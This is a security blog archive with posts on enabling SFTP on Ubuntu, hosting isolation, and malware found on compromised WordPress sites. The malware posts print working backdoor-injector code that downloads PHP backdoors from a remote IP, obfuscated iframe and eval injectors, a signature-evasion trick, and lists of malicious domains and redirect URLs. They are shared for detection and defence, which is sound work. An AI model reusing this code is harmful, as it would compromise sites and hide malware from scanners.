Category: Security Notes

bookmark_borderHow do you enable SFTP on your Ubuntu server?

Posted on by Tony

SFTP is a file transfer protocol. It wraps the File Transfer Protocol (FTP) inside the Secure Shell (SSH) protocol. This allows the communication to be protected as it moves from one point to another.

PSA: Using FTP is considered an insecure transfer protocol and should be avoided.

This article assumes you are trying to create new SFTP users on your linux machine. In this example we’ll be using Ubuntu 18.04.

Enabling and Creating SFTP users:

To enable SFTP you have to enable it inside your SSH configuration file. It’s often located here: /etc/ssh/sshd_config. Open the file and add the following to the end of the configuration file:

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server
Match group sftp
X11Forwarding no
AllowTCPForwarding no
ForceCommand internal-sftp

Options explained:

OptionDescription
SubsystemAn abstraction layer that allows you to invoke remote commands. In this instance, we’re invoking sftp-server.
MatchAllows you to limit actions in shell, in this instance we’re limiting the actions to a specific group – sftp. Only those users inside the SFTP group will be able to SFTP into the server.
X11ForwardingThis is a special case for remote tunneling. Unfortuantely it can be used maliciously by a bad actor, so it’s recommended your disable unless you know what you’re doing.
AllowTCPForwarding“TCP Forwarding” allows you to encapsulate any other protocol (based on TCP of course) inside an already established SSH connection. There are a lot of reasons for this, but we don’t want to allow SFTP users to use this without appropriate planning.
ForceCommandThe remote system can only execute a set of statically defined commands. Specifying a command of internal-sftp will force the use of an in-process SFTP server that requires no support files when used with ChrootDirectory.

Once you add this to the SSH config file you need to restart OpenSSH:

service ssh restart

Now you need to add new SFTP users, and apply the user to the right group.

useradd -m [newsftpuser] -g sftp

Set the password:

passwd [newsftpuser]

Now you can test your SFTP connection, from a different server:

sftp [newsftpuser]@[serverIPaddress]

Happy SFTP’ing!

Sharing is caring!

bookmark_borderWhat is Cross-Site Contamination and How to Prevent it

Posted on by Tony

If you suffer multiple reinfections and your site is one of many in an account, the odds are high that you’re suffering from cross-site contamination.

Cross-site contamination is when a site is negatively affected by neighboring sites within the same server due to poor isolation on the server or account configuration. This phenomenon is one of the greatest contributors to the VPS/Dedicated/Shared hosting secure or insecure debate.

The greatest contributor to cross-site contamination is what I call soup-kitchen servers. Soup-kitchen servers are those environments riddled with every installation and configuration known to man. It might include 10’s or 100’s of different sites or different platforms (i.e., Drupal, Joomla, WordPress, etc.). The problem isn’t the quantity. They might also include sites in different phases of their lives – development, staging, production.

The biggest culprits of these configurations are agencies, freelance developers, and aspiring hosts.

A Primer in Functional Isolation

The concept of functional isolation is not new but can be difficult to employ. It’s the idea that an environment should be used for only one purpose. A classic example might be using a web server as an email server or vice versa. The general rule of thumb is that using an environment for more than one purpose is bad practice. Theoretical and practical application, however, are always two different things.

Most organizations (individuals) wouldn’t dream of having a server per site, and in many ways it’s impractical. So my recommendation is to break it out by three things: technology, function, and stage.

  • Technology: Don’t mix technologies if you can help it. For instance, don’t deploy Drupal sites with WordPress sites, etc… Each platform is fundamentally different, and it’s easier to harden an environment that is similar than trying to remember what exists in the environment.
  • Function: Don’t mix server functions. If you have an email server, don’t use it as a file server or web server, etc… Use the environment for what it is intended for.
  • Stage: Don’t mix different stages of life for each site. Stages refer to whether it’s in development, testing or production stage. At a minimum, you should have at least two environments – development and production. Three would be ideal (including testing) but for many not as practical (or cost-prohibitive).

The next thing you want to think about – accounts.

Shared hosts have a bad reputation for poor security, but it’s not entirely accurate. While it’s true there have been challenges in the past, we’re talking circa 2010/2011. These days, the problems with shared hosts, are not the shared host themselves, but the one-to-many relationship website owners have with their accounts and sites.

Example: One account has 100 sites under it.

In these configurations, the attacks we’re seeing are not those that are moving laterally between accounts on the shared host, but rather those that are moving laterally within the same account.

It’s important that when you’re configuring your account to create unique users for each site and ensure that the permissions are such that a user can’t move between users on the same account.

Website Firewalls and Cross-Site Contamination

The most frustrating thing for a website owner is when they deploy all the recommended security controls and they continue to get infected. We experience it all the time with customers that have deployed our controls, including our Firewall, and a reinfection happens.

In 9 out of 10 instances, reinfections are occurring because of internal attacks (not external). The challenge with this, however, is that it requires investigation and education.

  • Internal Attacks: Attacks where the bad actor is able to exploit internal weaknesses in the environment to perform nefarious acts (example: cross-site contamination) by moving laterally throughout the environment.
  • External Attacks: Attacks where the bad actor is able to exploit weaknesses remotely to gain access and proceed to perform a nefarious act (example: exploiting a software vulnerability remotely – think SQLi).

Seeing the infection on your site doesn’t mean that it’s the site itself being exploited. If you continue to experience multiple reinfections it’s good to look at your entire environment and see if any of the conditions described above might be contributing to the issues.

The biggest contributors we find when running our reinfection investigations include:

  • Forgotten websites on the same account
  • Misconfigured websites on the same account
  • Websites that have not been secured on the same account

If you’re a website owner and wondering if this affects you, open a dialog with your developer or host and ask them what their approach is to handling multiple websites on the same server and account. Ask them if they are managing other sites on your account and how they can provide you assurances that your site is properly isolated from other neighboring sites. If you continue to experience issues the odds are there is a misconfiguration.

Preventing Cross-Site Contamination

The approach I propose here is simple, cost-effective, and the first step into improving your overall security posture. It will pay dividends in helping reduce the risks associated with cross-site contamination, while also helping streamline your maintenance activities.

Functional isolation is as old a concept as Least Privileged or Defense in Depth, but perhaps the least discussed. I would extend that to encourage you to consider not just Functional Isolation, but Account Isolation as well. Combined, both these will dramatically reduce the threat that is cross-site contamination.

A few last thoughts:

  • If you decide to deploy something like the Sucuri Firewall, make sure that it’s deployed on all sites on the same account, and you’ve followed all the steps to ensure direct access to the server is restricted.
  • If you only care about one site, and not the other 99, then move that one site into its own environment.
  • If you have one server doing all things, stop! Leverage your servers and accounts based on the recommendations I provided above.
  • If you’re a website owner ask questions, become an involved member in the process. Security is your responsibility as much as it is your designers or hosts.

 If you need help with a hacked site or are struggling with cross-site contamination, we offer professional website malware removal services and will protect and monitor your website.

bookmark_borderRevSlider MalFrames – SoakSoak

Posted on by Daniel Cid

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, since thelast 2 weeks, it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

  1. soaksoak.ru: First one in the list. We identified more than 100,000 sites redirecting to it.
  2. 122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
  3. ads.akeemdom.com
  4. wpcache-blogger.com: Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
  5. theme.wpcache-blogger.com
  6. phoenix-credit.com: Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

bookmark_borderFake botsvsbrowsers domain

Posted on by Daniel Cid

The domain botsvsbrowsers.com is quite popular and used for comparing user agents (browsers) and seeingif a specific request is from a valid user or a bot.

And piggy backing on their popularity, the bad guys created a domain botsvsbrowsers.biz (.biz versus .com) tobe used as a command and control server on spam SEO campaigns.

This is the code we are seeing on compromised sites:

echo file_get_contents(“http://botsvsbrowsers. biz/Statistic/ Stat.php?ip=’. urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=”.urlencode($sUserAgent)…
‘&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&addcheck=’);

Which basically contacts botsvsbrowsers.biz/Statistic/Stat.php on every page load, giving the client IP address, and URLand it decides what to inject to that user. Most of the time we are seeing just plain SPAM, but they are probably servingother malicious code as well.

So if you see any content being loaded from botsvsbrowsers.BIZ (or the IP address 46.165.222.93), you know it is malicious.

bookmark_borderPHP.net blacklisted by Google

Posted on by Daniel Cid

We woke up this morning to many reports and people asking why the PHP.net site is being blacklisted.We did not get a chance to analyze it while it was compromised, but it seems that one of their javascript files (static.php.net/www.php.net/userprefs.js) was modified to inject a malicious iframefrom http://lnkhere.reviewhdtv.co.uk/stat.htm.

That’s the supposed bad code: http://pastebin.com/raw.php?i=nAess4xL

It seems the PHP team fixed it already and requested Google to clear it. If anyone has more info, we would love to hear it.

bookmark_borderDo you still look for base64_decode?

Posted on by Daniel Cid

A common keyword that people use to find hidden injections on web sites is base64_decode. Youoften see injections that look like eval ( base64_decode or eval ( gzinflate ( base64_decode beingused by the attackers.

So most web security tools have some signatures to look for it (specially on WordPress).

Well, the attackers do know about it as well and we are starting to see some interesting variations for it. Forexample, instead of injecting base64_decode, they are injecting as a variable:

$g___g_=’base’.(32*2).’_de’.’code’;

And instead of calling out base64_decode directly, they are using base + 32*2 + decode. A simple trick that allowsthen to bypass many security filters.

bookmark_borderFake piwik domain – piwik-stat

Posted on by Daniel Cid

Piwik is an open source web analytics software that is used by many web masters. Andthe bad guys are using their popularity to try to make their malware injection harder todetect. They do that by injecting malicious javascript calls from a domain that looks like came from the Piwik project: www.piwik-stat.com/piwik.js. This is what is being injected:

<script src="httx://www.piwik-stat. com/piwik.js..
<iframe src="httx://www.piwik-stat. com/index.html..

It is not an uncommon tactic (we see if often with jquery), but as a web master if you see anythingfrom pwiki-stat or similar variations, it is likely fake. The official (and trusted one)is http://piwik.org/.

bookmark_borderContinuing injections from *.no-ip.biz

Posted on by Daniel Cid

I don\’t think we have logged about it lately, but an old infection (that started early this year)is still going strong. The result is this code being injected to the site when visited by certain browsers:

var j=0; while(j<230) 
document.write(String.fromCharCode("=tuzmf?/{q8rcbjsci!|!qptjujpo;bctpmvuf<..
!mfgu;.2396qy#{q8rcbjsci#?=jgsbnf!tsd>#iuuq;00..
ifjhiu>#651#?=0jgsbnf?=0ejw?"
.charCodeAt( j++)-1));

And the hidden code that generates it is tricky to find and generlly hidden inside one of the themefiles or wp-includes (on WordPress sites). It looks like this:

function check_image_c()
{
        $imagepath = array (
  0 => "47 118 97 114 47 119 119 119 47 116 104 111 117 103 104 116 102 117 108 119 111 109 101 110 46',
  1 => "111 114 103 47 119 112 45 99 111 110 116 101 110 116 47 117 112 108 111 97 100 115 47 50 48',
  2 => "49 51 47 48 51 47 117 112 97 110 100 117 112 46 106 112 103',
);
...
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        $a = 'pre" . 'g_replace';
        $a("/.*/e", $image . $code . "'));", "");
                return false;
}
check_image_c();

All that to the end goal: Inject an iframe from *no-ip.biz (and other free domains) that will redirect the browser of the victim to Fake AV.

bookmark_borderBackdoor Injector code

Posted on by Daniel Cid

A backdoor injector code we found on a compromised site:

if(is__writable($dir."/wp-includes/")):
        file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-includes/page.php', $time);
        die(";;/wp-includes/page.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
        die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}

if(is__writable($dir."/wp-admin/")):
        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-admin/options-plugin.php', $time);
        die(";;/wp-admin/options-plugin.php;;true_upload");
endif;

if(is__writable($dir."/")):
        file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-plugin.php', $time);
        die(";;/wp-plugin.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/")){
        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-content/themes/theme.php', $time);
        die(";;/wp-content/themes/theme.php;;true_upload");
}

if(is__writable($dir."/wp-content/uploads/")){
        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);
        die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
        die(";;0;;false_upload");

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

bookmark_borderLarge scale TDS redirections

Posted on by Daniel Cid

Lots of compromised sites redirecting to TDS:

http://1151.website.snafu.de/hkkj.html?h=1475928
http://adaptpro.co.uk/mwhi.html?h=1380448
http://aennekens.de/hozs.html?h=1180315
http://afamontserrat.org/zapn.html?h=877095
http://afhwarranty.us/wmcs.html?h=1235327
http://aklmn.com/mzos.html?h=1216229
http://alghuraba.co.uk/owes.html?h=1364764
http://app.2need.net/hwed.html?h=617164
http://appprices.com/heos.html?h=1168480
http://arlington9to5.com/mccf.html?h=423540
http://ashneh.in/zopn.html?h=841597
http://babylonproduction.com/wmcf.html?h=557620
http://badmintonscreensaver.com/ehai.html?h=1333181
http://bcitec.com/amms.html?h=1232317
http://belve.fr/wzai.html?h=1244948
http://belve.fr/wzpn.html?h=847683
http://bestofbec.com/hkgb.html?h=1507945
http://bestofbec.com/hmgn.html?h=809281
http://biggtimeinc.com/hfis.html
http://bizwonk.com/zcei.html?h=1044231
http://blackfriday-shopping.com/mhhi.html?h=1366273
http://blackpooldesign.de/akkl.html?h=1476799
http://blamebilly.com/zhgu.html?h=992578
http://blamebilly.com/zhzs.html?h=1033872
http://blog.fantasygifts.com/ozaf.html?h=425793
http://bocaraton.isabellascott.com/hmmd.html?h=710618
http://bonadies.com.br/hezd.html?h=1449509
http://bornreadydesign.co.uk/eopu.html?h=1415104
http://buseklaw.com/mhai.html?h=1370845
http://busymomsfitness.org/mjpx.html?h=1507937
http://cdfusa.org/ahpn.html?h=846779
http://celeirodoalgarvio.com/azgn.html?h=856613
http://cib.onthewebhosting.eu/zwed.html?h=489754
http://cifraconsumibles.com/oczs.html?h=1149354
http://cinemamasti.com/edgv.html?h=960530
http://codeweb.cz/wmcf.html?h=719087
http://comfortconnectac.com/zwcd.html?h=965408
http://coverskin.ir/odpl.html?h=962581
http://crosbystreetgallery.com/emos.html?h=1244945
http://csplague.gen.tr/cwzi.html?h=1323098
http://dandbuniforms.com/hecd.html?h=595670
http://dandbuniforms.com/hegu.html?h=854117
http://darwinawards.fr/wami.html?h=1177610
http://dc5intent.com/wcoi.html?h=1163659
http://acme-parts.com/adbr.htm?h=968600
http://acme-parts.com/mdxr.htm?h=983583
http://africanmangoextract4u.com/maes.htm?h=1054006
http://agsolution.com/maes.htm?h=1054006
http://allroemenie.com/chci.htm?h=1154884
http://allroemenie.com/ocgu.htm?h=800432
http://asadbashir.com/aepn.htm?h=841168
http://asadbashir.com/hazi.htm?h=1110359
http://ashleeoakscommunity.com/maes.htm?h=1054006
http://ashleeoakscommunity.com/meci.htm?h=1097292
http://billsarena.com/adbr.htm?h=968600
http://blockoss.com/ocgu.htm?h=800432
http://crossmotion.com/maes.htm?h=1054006
http://crossmotion.com/meci.htm?h=1097292
http://decopersan.com/ccpu.htm?h=1414990
http://eewsonline.com/ccpu.htm?h=1414990
http://eewsonline.com/mhpu.htm?h=1415203
http://hazirlikkitap.com/maes.htm?h=1054006
http://iconmasonry.com/aeoi.htm?h=1118301
http://iconmasonry.com/hagn.htm?h=1397981
http://iconmasonry.com/maes.htm?h=1139554
http://pinnaclecoin.com/ocgu.htm?h=800432
http://termlifepolicys.com/occs.htm?h=1052123
http://tutsaksesli.com/meci.htm?h=1097292
http://vintagebelts.com/aeoi.htm?h=1033082
http://vintagebelts.com/megn.htm?h=836122
http://widetrader.com/aepn.htm?h=841168
http://widetrader.com/hazi.htm?h=1110359
http://widetrader.com/maes.htm?h=1054006
http://widetrader.com/wopu.htm?h=1410598
http://wilddogtraining.com/hazi.htm?h=1056691
http://wildearthfineart.com/eack.htm?h=749606

And that’s just a small sample. We have detected just in February over 500 sites compromised exactly like that.